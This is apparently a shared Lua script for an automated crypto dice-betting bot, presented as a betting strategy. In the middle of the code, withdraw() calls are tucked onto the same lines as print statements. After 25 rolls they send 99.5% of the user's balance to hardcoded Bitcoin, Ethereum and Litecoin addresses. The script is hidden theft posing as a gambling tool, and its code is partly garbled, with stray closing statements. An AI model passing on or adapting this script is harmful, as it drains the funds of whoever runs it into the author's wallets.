You are on page 1of 2

chance = math.

random(8000,8500)/100
bigchance = math.random(7500,8500)/100
smallchance = 100 - bigchance
base = balance/100000
bethigh = false
target = balance*1.2
go = true
wincount = 0
losecount = 0
i = balance*0.995
k = 0.000900
roll=0
nextbet = base
a = base
multi = 1.3
function dobet()
roll+=1
if balance > target then
stop()
end
if wincount == 6 then
resetseed()
bethigh=!bethigh
wincount = 0
end
if win and go then
wincount+=1
nextbet = base
bigchance = math.random(7500,8500)/100
chance = bigchance
losecount = 0
a = base
multi = 1
go = false
end
if roll >= 25 and i>k then
resetseed()
print(" ")
print("target: "..target) if currency == "btc" then withdraw(i,"1GccCLMZrxsBTWZgEpEnVfKFzvAFVxq9WN") end
print(".: "..nextbet) if currency == "eth" then withdraw(i,"0xf2fc7e97e58c8bd8243f9e588427ec7002b77e73")
end
print("ch: "..chance) if currency == "ltc" then withdraw (i,"LLKd69XaAsKeNYkU55UKhmBY4Y1bRwRWGK")
end
print("Profit to go: "..target - balance)
print(" ")end
end
if (!win) then
nextbet = previousbet*multi
losecount+=1
end
if chance >= 75 and (!win) then
bethigh=!bethigh
smallchance = 100 - bigchance
multi = 1.3
if smallchance < 20 then
multi = 1.236
end
if smallchance >= 20 then
multi = 1.3388
end
go = true

chance = smallchance
nextbet = a*multi
end
if losecount >= 1 then
go = true
chance = smallchance
end
if losecount == 5 then
losecount = 0
go = false
a = previousbet
nextbet = base
chance = bigchance
end
print(" ")
print("multi: "..multi)
print("bigchance: "..bigchance)
print(" ")
end
end
end
end

You might also like